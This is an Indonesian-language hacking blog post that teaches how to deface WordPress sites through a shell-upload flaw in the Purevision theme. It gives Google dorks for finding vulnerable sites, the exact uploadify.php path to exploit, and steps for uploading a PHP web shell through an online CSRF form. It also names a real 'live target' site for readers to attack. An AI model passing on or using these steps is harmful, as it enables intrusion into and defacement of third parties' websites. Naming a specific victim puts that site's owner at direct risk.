Deface Dengan Metode WP Themes Purevision Shell Upload Vulnerability


Haii :* kali ini gue mau share tutor lagi nih, tutornya depes web CMS WordPress lagi ya :""""v
"Dih kok wp terus sih?", suka suka gue lah koplok.
Bugnya masih sama ada di themes. Lebih tepatnya themes purevision, makanya namanya jadi WP Themes Purevision Shell Upload Vulnerability. Wuih keren kan B)
Gas tutor lah koplok.

CSRF : csrf online klik sini

Dork :
- inurl:/wp-content/themes/purevision/
- inurl:/wp-content/themes/purevision/sliders/

Exploit : /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php

1. Dorking dulu pake salah satu dork ntu, kalo pengen manteb sih dorking di google images.

2. go exploit!! kalo vuln muncul blank (liat gambar) cara exploit : site.com/(path)/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php



3. Buka CSRF Online , isi kolom URL dengan site lu, kolom POST Type isi Filedata.



 4. Klik Lock Target, ntar muncul form upload.. Pilih file lu terus klik upload.



5. Kalo berhasil ntar muncul angka 1 di webnya. Terus tinggal akses, aksesnya site.com/namashell.php





Sekarang serah deh elu mau ngapain :P
"Dih itu kok sitenya disensor, biasanya dikasih live target", kalem dong pan8. Gue kasih live target kok jempol.. Udah gitu aja.

Live Target
- www.copelandtruc-king.com

Thanks to : MichZo - -=P0IS0NERzzID=- - LCR999X - --oo0oo-- - Ryu404 - FreakzSec -./GEMBEL - Mr.L0"Ch0 - RamsNotes31 - [LuCiiFeR] - Mr.BeanCyberID_404 - EquinoX - BL4CK_SKULL_C4P-FnF16 - 0tamega// - ~R3CAPTCHA ID~ - y0sh1 - Mr.L0weRS - Aniki - InurlID - ./Fri4K_4R4nz - /.Mr_Jack154 - XS4BL9 - ~./Khoer - ./Mr.X.Z0NK.X - Xanoi - PheonixTM - MSAttacker - R1z4 - ./Mr. BA645 -./Mr.B3rUk.404 - /Mr.KodoC - Mr. X3R0X - Renym - Anzel4 - Walk3r404z
Previous
Next Post »
Thanks for your comment